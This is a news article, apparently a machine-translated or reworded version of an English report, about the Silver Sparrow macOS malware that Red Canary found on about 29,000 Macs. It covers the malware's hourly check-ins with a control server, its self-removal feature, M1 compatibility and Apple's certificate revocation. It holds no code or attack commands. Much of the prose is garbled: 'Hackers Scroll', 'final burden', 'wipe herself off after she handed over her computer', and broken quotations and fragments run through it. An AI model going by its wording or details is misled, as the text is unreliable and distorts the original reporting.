Hackers Scroll Mysterious Malware to Thousands of Macs But Researchers Can't Solve Why


Photo: Justin Sullivan (Getty Images)


A new type of malware has infected Mac devices around the world – most notably in the US and parts of Europe – experts are unable to decide where it came from or what it did.

Malicious program, discovered by security firm Red Canary and affected 29,139 macOS endpoints in 153 countries, called “Silver Sparrow”with the highest infection rates In USA, UK, France, Germany and Canada. The program is also Useful Malware types compatible with products supported by Apple’s new M1 chip.

Researchers describe “Sparrow” as a ticking time bomb: The malware does not seem to have a specific function yet. Instead, it stays on hold by checking hourly with a control server to see if there are any new commands it should run on infected devices.

“After observing the malware for over a week, neither we nor our research partners have observed a final burden, and the ultimate goal of the Silver Sparrow event has left a mystery,” writes Red Canary’s Tony Lambert. “If a payload has already been delivered and removed, or if the enemy has a future timetable for distribution, we cannot know with certainty which payload will be distributed by the malware.” Also for researchers how devices are infected.

Even more disturbing, “Sparrow” seems designed to wipe herself off after she handed over her computer. load. Lambert said the program includes a file check that “removes all its components from the endpoint” causing the removal of all persistence mechanisms and scripts. Ars Technica writes Such capabilities are typically found in “high secrecy operations”, ie intrusion campaigns that are stealthy in nature.

Two different strains malware was discovered. Below is a technical breakdown of the two versions and how they work:


Hackers Scroll Mysterious Malware to Thousands of Macs But Researchers Can't Solve Why


Screenshot: Lucas Ropek / Red Canary

Although researchers were ultimately puzzled about the reason for malware’s existence, poses a credible danger to infected systems.

“While we have not yet observed that Silver Sparrow provides additional malicious payloads, its forward-looking M1 chip compatibility, global reach, relatively high contamination rate and operational maturity suggest that Silver Sparrow is a highly serious threat and is uniquely positioned to be potentially effective. Lambert pointing, she said.

Apple seems to have stepped in to stop the spread of malware. Company Told the MacRumors This should prevent other Macs from being infected, as it revokes the certificates of the developer accounts used to sign the packages for “Sparrow”.

Still, if you’re worried that your device might be compromised, you can check it out. list of indicators Provided by Red Canary.